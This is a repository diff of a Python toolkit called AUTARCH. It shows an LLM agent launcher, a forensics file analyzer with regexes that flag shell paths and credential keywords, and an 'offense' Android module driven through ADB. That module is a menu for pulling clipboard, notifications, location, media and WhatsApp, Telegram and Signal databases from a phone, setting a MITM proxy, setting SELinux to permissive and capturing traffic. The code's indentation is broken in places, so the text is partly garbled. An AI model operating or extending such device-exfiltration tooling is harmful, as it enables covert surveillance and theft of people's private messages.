# Shared pause after scan actions so results stay visible.
if choice in ["1", "2", "3", "4", "5", "6", "7", "8", "9"]:
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
except (EOFError, KeyboardInterrupt):
break
def run():
    """Module entry point: build a scanner and start its menu loop."""
    scanner = AdultScanner()
    scanner.run()


if __name__ == "__main__":
    run()

181
modules/agent.py Normal file
View File

@@ -0,0 +1,181 @@
"""
AUTARCH Agent Module
Interactive interface for running autonomous agent tasks
This module provides an interface to give tasks to the autonomous agent
and watch it work through them step by step.
"""
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "Autonomous agent for task execution"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "core"
# Add parent directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.agent import Agent, AgentState, AgentStep, AgentResult
from core.tools import get_tool_registry
from core.llm import get_llm, LLMError
from core.banner import Colors, clear_screen, display_banner
class AgentInterface:
"""Interactive interface for the AUTARCH agent."""
def __init__(self):
# The Agent itself is created lazily, once per task, in run_task().
self.agent = None
self.llm = get_llm()
self.tools = get_tool_registry()
def print_status(self, message: str, status: str = "info"):
    """Print a status message with a colour and symbol keyed by *status*."""
    style = {
        "info": (Colors.CYAN, "*"),
        "success": (Colors.GREEN, "+"),
        "warning": (Colors.YELLOW, "!"),
        "error": (Colors.RED, "X"),
    }
    color, symbol = style.get(status, (Colors.WHITE, '*'))
    print(f"{color}[{symbol}] {message}{Colors.RESET}")
def print_header(self, text: str):
    """Print a bold section title followed by a dim divider line."""
    print(f"\n{Colors.BOLD}{Colors.WHITE}{text}{Colors.RESET}\n{Colors.DIM}{'' * 50}{Colors.RESET}")
def show_tools(self):
    """List every registered tool with its category, description and params."""
    self.print_header("Available Tools")
    for tool in self.tools.list_tools():
        print(f"\n {Colors.CYAN}{tool.name}{Colors.RESET} [{tool.category}]")
        print(f" {Colors.DIM}{tool.description}{Colors.RESET}")
        if not tool.parameters:
            continue
        for param in tool.parameters:
            # '*' marks required parameters.
            marker = "*" if param.required else ""
            print(f" - {param.name}{marker}: {param.description}")
def on_step_callback(self, step: AgentStep):
    """Hook invoked after each agent step; prints a dim divider between steps."""
    print(f"\n{Colors.DIM}{'' * 40}{Colors.RESET}")
def on_state_callback(self, state: AgentState):
    """Hook for agent state changes; announces only terminal states."""
    # Only COMPLETE and ERROR are surfaced to keep output uncluttered.
    if state not in (AgentState.COMPLETE, AgentState.ERROR):
        return
    palette = {
        AgentState.IDLE: Colors.WHITE,
        AgentState.THINKING: Colors.MAGENTA,
        AgentState.EXECUTING: Colors.BLUE,
        AgentState.WAITING_USER: Colors.YELLOW,
        AgentState.COMPLETE: Colors.GREEN,
        AgentState.ERROR: Colors.RED,
    }
    color = palette.get(state, Colors.WHITE)
    print(f"{color}[State: {state.value}]{Colors.RESET}")
def run_task(self, task: str) -> AgentResult:
    """Create a fresh Agent wired to our callbacks and execute one task.

    Args:
        task: Task description.

    Returns:
        AgentResult with execution details.
    """
    agent = Agent(llm=self.llm, tools=self.tools, max_steps=20, verbose=True)
    agent.on_step = self.on_step_callback
    agent.on_state_change = self.on_state_callback
    # Keep a reference for inspection after the run.
    self.agent = agent
    return agent.run(task)
def interactive_loop(self):
"""Run interactive task input loop.

Reads task descriptions until 'exit' or Ctrl-C/EOF; 'tools' and 'help'
are handled as local commands, anything else is dispatched to run_task
and summarised.
"""
self.print_header("Agent Interface")
print(f"\n{Colors.WHITE}Enter a task for the agent to complete.")
print(f"Type 'tools' to see available tools.")
print(f"Type 'exit' to return to main menu.{Colors.RESET}\n")
while True:
try:
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
task = input(f"\n{Colors.GREEN}Task:{Colors.RESET} ").strip()
if not task:
continue
if task.lower() == 'exit':
break
if task.lower() == 'tools':
self.show_tools()
continue
if task.lower() == 'help':
print(f"\n{Colors.WHITE}Commands:{Colors.RESET}")
print(f" {Colors.CYAN}tools{Colors.RESET} - Show available tools")
print(f" {Colors.CYAN}exit{Colors.RESET} - Return to main menu")
print(f" {Colors.CYAN}help{Colors.RESET} - Show this help")
print(f"\n{Colors.WHITE}Or enter a task description for the agent.{Colors.RESET}")
continue
# Run the task
print(f"\n{Colors.CYAN}[*] Starting agent...{Colors.RESET}\n")
result = self.run_task(task)
# Show result summary
print(f"\n{Colors.DIM}{'' * 50}{Colors.RESET}")
if result.success:
print(f"{Colors.GREEN}[+] Task completed successfully{Colors.RESET}")
print(f"\n{Colors.WHITE}Summary:{Colors.RESET} {result.summary}")
else:
print(f"{Colors.RED}[X] Task failed{Colors.RESET}")
if result.error:
print(f"{Colors.RED}Error:{Colors.RESET} {result.error}")
if result.summary:
print(f"{Colors.WHITE}Summary:{Colors.RESET} {result.summary}")
print(f"\n{Colors.DIM}Steps taken: {len(result.steps)}{Colors.RESET}")
except (EOFError, KeyboardInterrupt):
print(f"\n\n{Colors.YELLOW}[!] Interrupted{Colors.RESET}")
break
def run(self):
    """Module entry point.

    Shows the banner, lazily loads the LLM if it is not already in
    memory (bailing out with guidance on failure), then enters the
    interactive task loop.
    """
    clear_screen()
    display_banner()
    print(f"{Colors.BOLD}{Colors.WHITE} AUTARCH Autonomous Agent{Colors.RESET}")
    print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
    # Check if model is loaded
    if not self.llm.is_loaded:
        self.print_status("Loading model...", "info")
        try:
            self.llm.load_model(verbose=True)
        except LLMError as e:
            # Without a model the agent cannot run; return to the menu.
            self.print_status(f"Failed to load model: {e}", "error")
            self.print_status("Please run setup to configure a model.", "warning")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
    self.interactive_loop()
def run():
    """Module entry point: build the interface and hand over control."""
    interface = AgentInterface()
    interface.run()


if __name__ == "__main__":
    run()

1453
modules/agent_hal.py Normal file

File diff suppressed because it is too large Load Diff

417
modules/analyze.py Normal file
View File

@@ -0,0 +1,417 @@
"""
AUTARCH Analyze Module
Forensics and analysis tools
File analysis, hash generation, string extraction, and more.
"""
import os
import sys
import subprocess
import hashlib
import re
try:
import magic
except ImportError:
magic = None
from pathlib import Path
from datetime import datetime
# Module metadata
DESCRIPTION = "Forensics & file analysis tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class Analyzer:
    """Forensics and analysis tools.

    Interactive menu exposing file analysis, string extraction, hash
    lookup links, log analysis, hex dumps and file comparison.
    """
    def __init__(self):
        pass
    def print_status(self, message: str, status: str = "info"):
        """Print a colour-coded status line: [*] info, [+] success, [!] warning, [X] error."""
        colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
        symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
        print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
    def run_cmd(self, cmd: str) -> tuple:
        """Run a shell command; return (success, stripped stdout).

        NOTE(review): callers interpolate file paths into cmd and this
        runs with shell=True, so paths containing quotes can escape the
        quoting — acceptable for an interactive tool, but worth knowing.
        """
        try:
            result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=60)
            return result.returncode == 0, result.stdout.strip()
        except (subprocess.SubprocessError, OSError):
            # Narrowed from a bare except so Ctrl-C is not swallowed.
            return False, ""
    def get_file_hashes(self, filepath: str) -> dict:
        """Calculate MD5, SHA1 and SHA256 digests for a file.

        Streams the file in chunks so large files need not fit in
        memory.  Returns {} if the path is missing or not a regular file.
        """
        p = Path(filepath)
        if not p.exists() or not p.is_file():
            return {}
        digests = {
            'md5': hashlib.md5(),
            'sha1': hashlib.sha1(),
            'sha256': hashlib.sha256(),
        }
        with open(p, 'rb') as f:
            # One pass over the file updates all three digests.
            for chunk in iter(lambda: f.read(1024 * 1024), b''):
                for digest in digests.values():
                    digest.update(chunk)
        return {name: digest.hexdigest() for name, digest in digests.items()}
    def analyze_file(self):
        """Comprehensive file analysis: metadata, type, hashes, executables."""
        print(f"\n{Colors.BOLD}File Analysis{Colors.RESET}")
        filepath = input(f"{Colors.WHITE}Enter file path: {Colors.RESET}").strip()
        if not filepath:
            return
        p = Path(filepath).expanduser()
        if not p.exists():
            self.print_status(f"File not found: {filepath}", "error")
            return
        print(f"\n{Colors.CYAN}{'' * 50}{Colors.RESET}")
        print(f"{Colors.BOLD}File: {p.name}{Colors.RESET}")
        print(f"{Colors.CYAN}{'' * 50}{Colors.RESET}\n")
        # Basic info
        stat = p.stat()
        print(f"{Colors.CYAN}Basic Info:{Colors.RESET}")
        print(f" Path: {p.absolute()}")
        print(f" Size: {stat.st_size:,} bytes")
        print(f" Modified: {datetime.fromtimestamp(stat.st_mtime)}")
        print(f" Created: {datetime.fromtimestamp(stat.st_ctime)}")
        print(f" Mode: {oct(stat.st_mode)}")
        # File type: prefer python-magic when installed, else the file(1) tool
        print(f"\n{Colors.CYAN}File Type:{Colors.RESET}")
        try:
            if magic is None:
                # python-magic import failed at module load; use fallback.
                raise ImportError("python-magic not available")
            file_magic = magic.Magic(mime=True)
            mime_type = file_magic.from_file(str(p))
            print(f" MIME: {mime_type}")
            file_magic = magic.Magic()
            file_desc = file_magic.from_file(str(p))
            print(f" Type: {file_desc}")
        except Exception:
            success, output = self.run_cmd(f"file '{p}'")
            if success:
                print(f" Type: {output.split(':', 1)[-1].strip()}")
        # Hashes
        print(f"\n{Colors.CYAN}Hashes:{Colors.RESET}")
        hashes = self.get_file_hashes(str(p))
        for algo, value in hashes.items():
            print(f" {algo.upper():8} {value}")
        # Deeper inspection for anything that looks executable
        if p.suffix in ['.exe', '.dll', '.so', '.elf', ''] or stat.st_mode & 0o111:
            self.analyze_executable(str(p))
    def analyze_executable(self, filepath: str):
        """Additional analysis for executables: notable strings, ELF check."""
        print(f"\n{Colors.CYAN}Executable Analysis:{Colors.RESET}")
        # Strings
        success, output = self.run_cmd(f"strings '{filepath}' 2>/dev/null | head -50")
        if success and output:
            # Look for interesting strings
            interesting = []
            patterns = [
                r'https?://[^\s]+',  # URLs
                r'\d+\.\d+\.\d+\.\d+',  # IPs
                r'password|passwd|secret|key|token',  # Credentials
                r'/bin/sh|/bin/bash|cmd\.exe',  # Shells
            ]
            for line in output.split('\n'):
                for pattern in patterns:
                    if re.search(pattern, line, re.I):
                        interesting.append(line.strip())
                        break  # one match per line is enough
            if interesting:
                print(f" {Colors.YELLOW}Interesting strings found:{Colors.RESET}")
                for s in interesting[:10]:
                    print(f" {s[:80]}")
        # Check for packing
        success, output = self.run_cmd(f"readelf -h '{filepath}' 2>/dev/null")
        if success:
            if 'Entry point' in output:
                print(f" ELF executable detected")
    def extract_strings(self):
        """Extract printable strings from a file and categorize them."""
        print(f"\n{Colors.BOLD}String Extraction{Colors.RESET}")
        filepath = input(f"{Colors.WHITE}Enter file path: {Colors.RESET}").strip()
        if not filepath:
            return
        p = Path(filepath).expanduser()
        if not p.exists():
            self.print_status(f"File not found", "error")
            return
        min_len = input(f"{Colors.WHITE}Minimum string length [4]: {Colors.RESET}").strip() or "4"
        # Validate before interpolating into the shell command below.
        if not min_len.isdigit():
            self.print_status("Invalid minimum length", "error")
            return
        print(f"\n{Colors.CYAN}Extracting strings...{Colors.RESET}\n")
        success, output = self.run_cmd(f"strings -n {min_len} '{p}' 2>/dev/null")
        if success:
            lines = output.split('\n')
            print(f"Found {len(lines)} strings\n")
            # Categorize
            urls = [line for line in lines if re.search(r'https?://', line)]
            ips = [line for line in lines if re.search(r'\b\d+\.\d+\.\d+\.\d+\b', line)]
            paths = [line for line in lines if re.search(r'^/[a-z]', line, re.I)]
            emails = [line for line in lines if re.search(r'[\w.-]+@[\w.-]+', line)]
            if urls:
                print(f"{Colors.CYAN}URLs ({len(urls)}):{Colors.RESET}")
                for u in urls[:10]:
                    print(f" {u}")
            if ips:
                print(f"\n{Colors.CYAN}IP Addresses ({len(ips)}):{Colors.RESET}")
                for ip in ips[:10]:
                    print(f" {ip}")
            if emails:
                print(f"\n{Colors.CYAN}Emails ({len(emails)}):{Colors.RESET}")
                for e in emails[:10]:
                    print(f" {e}")
            if paths:
                print(f"\n{Colors.CYAN}Paths ({len(paths)}):{Colors.RESET}")
                # BUG FIX: the loop variable previously shadowed the Path
                # object `p`, so `p.stem` below raised AttributeError.
                for path_str in paths[:10]:
                    print(f" {path_str}")
            # Save option
            save = input(f"\n{Colors.WHITE}Save all strings to file? (y/n): {Colors.RESET}").strip().lower()
            if save == 'y':
                outfile = f"{p.stem}_strings.txt"
                with open(outfile, 'w') as f:
                    f.write(output)
                self.print_status(f"Saved to {outfile}", "success")
    def hash_lookup(self):
        """Identify a hash by its hex length and print threat-intel URLs."""
        print(f"\n{Colors.BOLD}Hash Lookup{Colors.RESET}")
        hash_input = input(f"{Colors.WHITE}Enter hash (MD5/SHA1/SHA256): {Colors.RESET}").strip()
        if not hash_input:
            return
        # Determine hash type from the digest's hex length
        hash_len = len(hash_input)
        if hash_len == 32:
            hash_type = "MD5"
        elif hash_len == 40:
            hash_type = "SHA1"
        elif hash_len == 64:
            hash_type = "SHA256"
        else:
            self.print_status("Invalid hash length", "error")
            return
        print(f"\n{Colors.CYAN}Hash Type: {hash_type}{Colors.RESET}")
        print(f"{Colors.CYAN}Hash: {hash_input}{Colors.RESET}\n")
        # Only prints lookup URLs — no network calls are made here.
        print(f"{Colors.DIM}VirusTotal: https://www.virustotal.com/gui/file/{hash_input}{Colors.RESET}")
        print(f"{Colors.DIM}Hybrid Analysis: https://www.hybrid-analysis.com/search?query={hash_input}{Colors.RESET}")
    def analyze_log(self):
        """Analyze a log file: top IPs, error entries, time range."""
        print(f"\n{Colors.BOLD}Log Analysis{Colors.RESET}")
        print(f"{Colors.DIM}Common logs: /var/log/auth.log, /var/log/syslog, /var/log/apache2/access.log{Colors.RESET}\n")
        filepath = input(f"{Colors.WHITE}Enter log file path: {Colors.RESET}").strip()
        if not filepath:
            return
        p = Path(filepath).expanduser()
        if not p.exists():
            self.print_status(f"File not found", "error")
            return
        print(f"\n{Colors.CYAN}Analyzing {p.name}...{Colors.RESET}\n")
        # Read log (errors='ignore' tolerates mixed encodings)
        try:
            with open(p, 'r', errors='ignore') as f:
                lines = f.readlines()
        except OSError as e:
            self.print_status(f"Error reading file: {e}", "error")
            return
        print(f"Total lines: {len(lines)}")
        # Extract IPs and rank by frequency
        all_ips = []
        for line in lines:
            ips = re.findall(r'\b(\d+\.\d+\.\d+\.\d+)\b', line)
            all_ips.extend(ips)
        if all_ips:
            from collections import Counter
            ip_counts = Counter(all_ips)
            print(f"\n{Colors.CYAN}Top IP Addresses:{Colors.RESET}")
            for ip, count in ip_counts.most_common(10):
                print(f" {ip:20} {count:>6} occurrences")
        # Look for error patterns
        errors = [l for l in lines if re.search(r'error|fail|denied|invalid', l, re.I)]
        if errors:
            print(f"\n{Colors.YELLOW}Error/Failure entries: {len(errors)}{Colors.RESET}")
            print(f"{Colors.DIM}Recent errors:{Colors.RESET}")
            for e in errors[-5:]:
                print(f" {e.strip()[:100]}")
        # Timestamps (syslog-style "Mon DD HH:MM:SS")
        timestamps = []
        for line in lines:
            match = re.search(r'(\w{3}\s+\d+\s+\d+:\d+:\d+)', line)
            if match:
                timestamps.append(match.group(1))
        if timestamps:
            print(f"\n{Colors.CYAN}Time Range:{Colors.RESET}")
            print(f" First: {timestamps[0]}")
            print(f" Last: {timestamps[-1]}")
    def hex_dump(self):
        """Print a classic hex+ASCII dump of a byte range of a file."""
        print(f"\n{Colors.BOLD}Hex Dump{Colors.RESET}")
        filepath = input(f"{Colors.WHITE}Enter file path: {Colors.RESET}").strip()
        if not filepath:
            return
        p = Path(filepath).expanduser()
        if not p.exists():
            self.print_status(f"File not found", "error")
            return
        offset = input(f"{Colors.WHITE}Start offset [0]: {Colors.RESET}").strip() or "0"
        length = input(f"{Colors.WHITE}Length [256]: {Colors.RESET}").strip() or "256"
        try:
            offset = int(offset, 0)  # base 0 also accepts hex like 0x100
            length = int(length, 0)
        except ValueError:
            self.print_status("Invalid offset/length", "error")
            return
        print(f"\n{Colors.CYAN}Hex dump of {p.name} (offset={hex(offset)}, length={length}):{Colors.RESET}\n")
        with open(p, 'rb') as f:
            f.seek(offset)
            data = f.read(length)
        # Format hex dump: 16 bytes per row, printable ASCII on the right
        for i in range(0, len(data), 16):
            chunk = data[i:i+16]
            hex_part = ' '.join(f'{b:02x}' for b in chunk)
            ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
            print(f" {offset+i:08x} {hex_part:<48} {ascii_part}")
    def compare_files(self):
        """Compare two files by size, hashes, and (for text) a short diff."""
        print(f"\n{Colors.BOLD}File Comparison{Colors.RESET}")
        file1 = input(f"{Colors.WHITE}First file: {Colors.RESET}").strip()
        file2 = input(f"{Colors.WHITE}Second file: {Colors.RESET}").strip()
        if not file1 or not file2:
            return
        p1 = Path(file1).expanduser()
        p2 = Path(file2).expanduser()
        if not p1.exists() or not p2.exists():
            self.print_status("One or both files not found", "error")
            return
        print(f"\n{Colors.CYAN}Comparing files...{Colors.RESET}\n")
        # Size comparison
        s1, s2 = p1.stat().st_size, p2.stat().st_size
        print(f"File 1 size: {s1:,} bytes")
        print(f"File 2 size: {s2:,} bytes")
        print(f"Difference: {abs(s1-s2):,} bytes")
        # Hash comparison
        h1 = self.get_file_hashes(str(p1))
        h2 = self.get_file_hashes(str(p2))
        print(f"\n{Colors.CYAN}Hash Comparison:{Colors.RESET}")
        for algo in ['md5', 'sha256']:
            match = h1.get(algo) == h2.get(algo)
            status = f"{Colors.GREEN}MATCH{Colors.RESET}" if match else f"{Colors.RED}DIFFERENT{Colors.RESET}"
            print(f" {algo.upper()}: {status}")
        if h1.get('sha256') != h2.get('sha256'):
            # Show diff if text files
            success, output = self.run_cmd(f"diff '{p1}' '{p2}' 2>/dev/null | head -30")
            if success and output:
                print(f"\n{Colors.CYAN}Differences (first 30 lines):{Colors.RESET}")
                print(output)
    def show_menu(self):
        """Render the analysis menu."""
        clear_screen()
        display_banner()
        print(f"{Colors.CYAN}{Colors.BOLD} Analysis & Forensics{Colors.RESET}")
        print(f"{Colors.DIM} File analysis and forensics tools{Colors.RESET}")
        print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
        print()
        print(f" {Colors.CYAN}[1]{Colors.RESET} Analyze File")
        print(f" {Colors.CYAN}[2]{Colors.RESET} Extract Strings")
        print(f" {Colors.CYAN}[3]{Colors.RESET} Hash Lookup")
        print(f" {Colors.CYAN}[4]{Colors.RESET} Analyze Log")
        print(f" {Colors.CYAN}[5]{Colors.RESET} Hex Dump")
        print(f" {Colors.CYAN}[6]{Colors.RESET} Compare Files")
        print()
        print(f" {Colors.DIM}[0]{Colors.RESET} Back")
        print()
    def run(self):
        """Menu loop: dispatch a choice, pause after each action."""
        # Dispatch table keeps the loop flat and easy to extend.
        actions = {
            "1": self.analyze_file,
            "2": self.extract_strings,
            "3": self.hash_lookup,
            "4": self.analyze_log,
            "5": self.hex_dump,
            "6": self.compare_files,
        }
        while True:
            self.show_menu()
            try:
                choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
                if choice == "0":
                    break
                action = actions.get(choice)
                if action:
                    action()
                    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            except (EOFError, KeyboardInterrupt):
                break
def run():
    """Module entry point."""
    analyzer = Analyzer()
    analyzer.run()


if __name__ == "__main__":
    run()

380
modules/android_advanced.py Normal file
View File

@@ -0,0 +1,380 @@
"""
Android Advanced Exploits - Network, app manipulation, system control, data exfil
"""
DESCRIPTION = "Android advanced exploits (network, apps, system, data extraction)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class AndroidAdvanced:
    """Interactive menu for advanced Android exploits.

    Thin UI over core.android_exploit's manager: data exfiltration,
    network control, app manipulation and system-level operations on a
    selected ADB device.  Items tagged [ROOT] require a rooted device.
    """
    def __init__(self):
        # Lazy imports keep module discovery cheap; managers are created once.
        from core.android_exploit import get_exploit_manager
        from core.hardware import get_hardware_manager
        self.mgr = get_exploit_manager()
        self.hw = get_hardware_manager()
        # Serial of the selected ADB device; None until a device is chosen.
        self.serial = None
    def _select_device(self):
        """Choose a target device; auto-selects when exactly one is attached."""
        devices = self.hw.adb_devices()
        if not devices:
            print(" No ADB devices connected.")
            return
        if len(devices) == 1:
            self.serial = devices[0]['serial']
            print(f" Selected: {self.serial}")
            return
        print("\n Select device:")
        for i, d in enumerate(devices, 1):
            print(f" {i}) {d['serial']} {d.get('model','')}")
        try:
            choice = int(input(" > ").strip())
            if 1 <= choice <= len(devices):
                self.serial = devices[choice - 1]['serial']
        except (ValueError, EOFError, KeyboardInterrupt):
            # Invalid or aborted input keeps the previous selection.
            pass
    def _ensure_device(self):
        """Return True once a device is selected, prompting if needed."""
        if not self.serial:
            self._select_device()
        return self.serial is not None
    def show_menu(self):
        """Print the categorized exploit menu."""
        print(f"\n{'='*60}")
        print(" Advanced Android Exploits")
        print(f"{'='*60}")
        print(f" Device: {self.serial or '(none)'}")
        print()
        print(" ── Data Exfiltration ──")
        print(" [1] Clipboard Content")
        print(" [2] Notifications")
        print(" [3] Location Data")
        print(" [4] List Media Files")
        print(" [5] Pull Media Folder")
        print(" [6] WhatsApp DB [ROOT]")
        print(" [7] Telegram DB [ROOT]")
        print(" [8] Signal DB [ROOT]")
        print(" [9] Dump Settings (all)")
        print(" [10] Device Fingerprint")
        print(" [11] Dump Any Database [ROOT]")
        print()
        print(" ── Network ──")
        print(" [20] Network Info")
        print(" [21] Set Proxy (MITM)")
        print(" [22] Clear Proxy")
        print(" [23] Set DNS [ROOT]")
        print(" [24] WiFi Scan")
        print(" [25] WiFi Connect")
        print(" [26] WiFi On/Off")
        print(" [27] Enable Hotspot")
        print(" [28] Capture Traffic [ROOT]")
        print(" [29] Port Forward")
        print(" [30] ADB over WiFi")
        print()
        print(" ── App Manipulation ──")
        print(" [40] Grant Permission")
        print(" [41] Revoke Permission")
        print(" [42] List App Permissions")
        print(" [43] Disable App")
        print(" [44] Enable App")
        print(" [45] Clear App Data")
        print(" [46] Force Stop App")
        print(" [47] Launch App")
        print(" [48] Launch Activity")
        print(" [49] Send Broadcast")
        print(" [50] Content Query")
        print(" [51] Enable Overlay")
        print()
        print(" ── System ──")
        print(" [60] SELinux Permissive [ROOT]")
        print(" [61] Remount /system RW [ROOT]")
        print(" [62] Logcat Sensitive Data")
        print(" [63] Deploy Frida Server [ROOT]")
        print(" [64] Running Processes")
        print(" [65] Open Ports")
        print(" [66] Modify Setting")
        print()
        print(" [s] Select Device")
        print(" [0] Back")
        print()
    def _print_result(self, r):
        """Pretty-print a result dict, truncating long values and collections."""
        import json  # NOTE(review): unused here; kept as-is
        if isinstance(r, dict):
            for k, v in r.items():
                if isinstance(v, (list, dict)) and len(str(v)) > 200:
                    # Summarize bulky values instead of flooding the terminal.
                    print(f" {k}: [{len(v)} items]" if isinstance(v, list) else f" {k}: [dict]")
                else:
                    val = str(v)
                    if len(val) > 120:
                        val = val[:120] + '...'
                    print(f" {k}: {val}")
    def run_interactive(self):
        """Main loop: read a menu choice and dispatch it to the device."""
        while True:
            self.show_menu()
            try:
                choice = input(" Select > ").strip().lower()
            except (EOFError, KeyboardInterrupt):
                break
            if choice == '0':
                break
            elif choice == 's':
                self._select_device()
                continue
            if not self._ensure_device():
                continue
            try:
                self._dispatch(choice)
            except (EOFError, KeyboardInterrupt):
                # Abort only the current action; stay in the menu.
                continue
    def _dispatch(self, choice):
        """Route a menu choice to the matching exploit-manager call.

        Grouped by menu section; each branch prompts for its own
        parameters and prints a condensed view of the result.
        """
        s = self.serial
        m = self.mgr
        # Data Exfil
        if choice == '1':
            self._print_result(m.extract_clipboard(s))
        elif choice == '2':
            r = m.dump_notifications(s)
            print(f" {r.get('count', 0)} notifications:")
            for n in r.get('notifications', [])[:20]:
                print(f" [{n.get('package','')}] {n.get('title','')} - {n.get('text','')}")
        elif choice == '3':
            self._print_result(m.extract_location(s))
        elif choice == '4':
            t = input(" Type (photos/downloads/screenshots/whatsapp_media): ").strip() or 'photos'
            r = m.extract_media_list(s, media_type=t)
            print(f" {r['count']} files in {r['path']}:")
            for f in r['files'][:30]:
                print(f" {f}")
        elif choice == '5':
            t = input(" Type (photos/downloads/screenshots): ").strip() or 'photos'
            lim = input(" Limit [50]: ").strip()
            r = m.pull_media_folder(s, media_type=t, limit=int(lim) if lim else 50)
            print(f" Pulled {r['count']} files to {r.get('output_dir','')}")
        elif choice == '6':
            r = m.extract_whatsapp_db(s)
            self._print_result(r)
        elif choice == '7':
            r = m.extract_telegram_db(s)
            self._print_result(r)
        elif choice == '8':
            r = m.extract_signal_db(s)
            self._print_result(r)
        elif choice == '9':
            r = m.dump_all_settings(s)
            for ns, entries in r.get('settings', {}).items():
                print(f"\n [{ns}] ({len(entries)} entries)")
                # Show only the first 10 entries per namespace.
                for k, v in list(entries.items())[:10]:
                    print(f" {k}={v}")
                if len(entries) > 10:
                    print(f" ... and {len(entries)-10} more")
        elif choice == '10':
            fp = m.get_device_fingerprint(s)
            print("\n Device Fingerprint:")
            for k, v in fp.items():
                print(f" {k:<25} {v}")
        elif choice == '11':
            db_path = input(" Database path on device: ").strip()
            table = input(" Table name (or Enter to list tables): ").strip() or None
            r = m.dump_database(s, db_path, table=table)
            if r['success']:
                print(f" Tables: {', '.join(r['tables'])}")
                if r['rows']:
                    for row in r['rows'][:10]:
                        print(f" {row}")
            else:
                print(f" Error: {r['error']}")
        # Network
        elif choice == '20':
            info = m.get_network_info(s)
            for k, v in info.items():
                val = str(v)[:200]
                print(f" {k}: {val}")
        elif choice == '21':
            host = input(" Proxy host: ").strip()
            port = input(" Proxy port: ").strip()
            if host and port:
                r = m.set_proxy(s, host, port)
                print(f" Proxy set: {r.get('proxy')}")
        elif choice == '22':
            m.clear_proxy(s)
            print(" Proxy cleared.")
        elif choice == '23':
            dns1 = input(" DNS1: ").strip()
            dns2 = input(" DNS2 (optional): ").strip()
            if dns1:
                m.set_dns(s, dns1, dns2)
                print(f" DNS set: {dns1} {dns2}")
        elif choice == '24':
            r = m.wifi_scan(s)
            print(r.get('output', 'No results'))
        elif choice == '25':
            ssid = input(" SSID: ").strip()
            pwd = input(" Password (Enter for open): ").strip()
            if ssid:
                r = m.wifi_connect(s, ssid, pwd)
                print(f" {r.get('output', 'Done')}")
        elif choice == '26':
            action = input(" Enable or disable? [e/d]: ").strip().lower()
            if action == 'd':
                m.wifi_disconnect(s)
                print(" WiFi disabled.")
            else:
                m.wifi_enable(s)
                print(" WiFi enabled.")
        elif choice == '27':
            ssid = input(" Hotspot SSID [AUTARCH_AP]: ").strip() or 'AUTARCH_AP'
            pwd = input(" Password [autarch123]: ").strip() or 'autarch123'
            r = m.enable_hotspot(s, ssid, pwd)
            print(f" Hotspot: {ssid}")
        elif choice == '28':
            iface = input(" Interface [any]: ").strip() or 'any'
            dur = input(" Duration seconds [30]: ").strip()
            filt = input(" Filter (optional): ").strip()
            r = m.capture_traffic(s, iface, int(dur) if dur else 30, filt)
            if r['success']:
                print(f" PCAP saved: {r['path']} ({r['size']} bytes)")
            else:
                print(f" Error: {r['error']}")
        elif choice == '29':
            lp = input(" Local port: ").strip()
            rp = input(" Remote port: ").strip()
            if lp and rp:
                r = m.port_forward(s, lp, rp)
                print(f" Forward: localhost:{lp} -> device:{rp}")
        elif choice == '30':
            port = input(" Port [5555]: ").strip() or '5555'
            r = m.enable_adb_wifi(s, int(port))
            print(f" ADB WiFi: {r.get('connect_cmd', '?')}")
        # App Manipulation
        elif choice == '40':
            pkg = input(" Package: ").strip()
            perm = input(" Permission (e.g. android.permission.CAMERA): ").strip()
            if pkg and perm:
                r = m.grant_permission(s, pkg, perm)
                print(f" {r.get('output', 'Done')}")
        elif choice == '41':
            pkg = input(" Package: ").strip()
            perm = input(" Permission: ").strip()
            if pkg and perm:
                r = m.revoke_permission(s, pkg, perm)
                print(f" {r.get('output', 'Done')}")
        elif choice == '42':
            pkg = input(" Package: ").strip()
            if pkg:
                r = m.list_permissions(s, pkg)
                print(f" Granted ({len(r['granted'])}):")
                for p in r['granted'][:20]:
                    print(f" + {p}")
                print(f" Denied ({len(r['denied'])}):")
                for p in r['denied'][:10]:
                    print(f" - {p}")
        elif choice == '43':
            pkg = input(" Package to disable: ").strip()
            if pkg:
                r = m.disable_app(s, pkg)
                print(f" {r.get('output', 'Done')}")
        elif choice == '44':
            pkg = input(" Package to enable: ").strip()
            if pkg:
                r = m.enable_app(s, pkg)
                print(f" {r.get('output', 'Done')}")
        elif choice == '45':
            pkg = input(" Package to clear: ").strip()
            if pkg:
                # Destructive: wipes the app's data; require confirmation.
                confirm = input(f" Clear ALL data for {pkg}? [y/N]: ").strip().lower()
                if confirm == 'y':
                    r = m.clear_app_data(s, pkg)
                    print(f" {r.get('output', 'Done')}")
        elif choice == '46':
            pkg = input(" Package to force stop: ").strip()
            if pkg:
                m.force_stop_app(s, pkg)
                print(f" Force stopped {pkg}")
        elif choice == '47':
            pkg = input(" Package to launch: ").strip()
            if pkg:
                m.launch_app(s, pkg)
                print(f" Launched {pkg}")
        elif choice == '48':
            comp = input(" Component (com.pkg/.Activity): ").strip()
            extras = input(" Extras (optional am flags): ").strip()
            if comp:
                r = m.launch_activity(s, comp, extras)
                print(f" {r.get('output', 'Done')}")
        elif choice == '49':
            action = input(" Broadcast action: ").strip()
            extras = input(" Extras (optional): ").strip()
            if action:
                r = m.send_broadcast(s, action, extras)
                print(f" {r.get('output', 'Done')}")
        elif choice == '50':
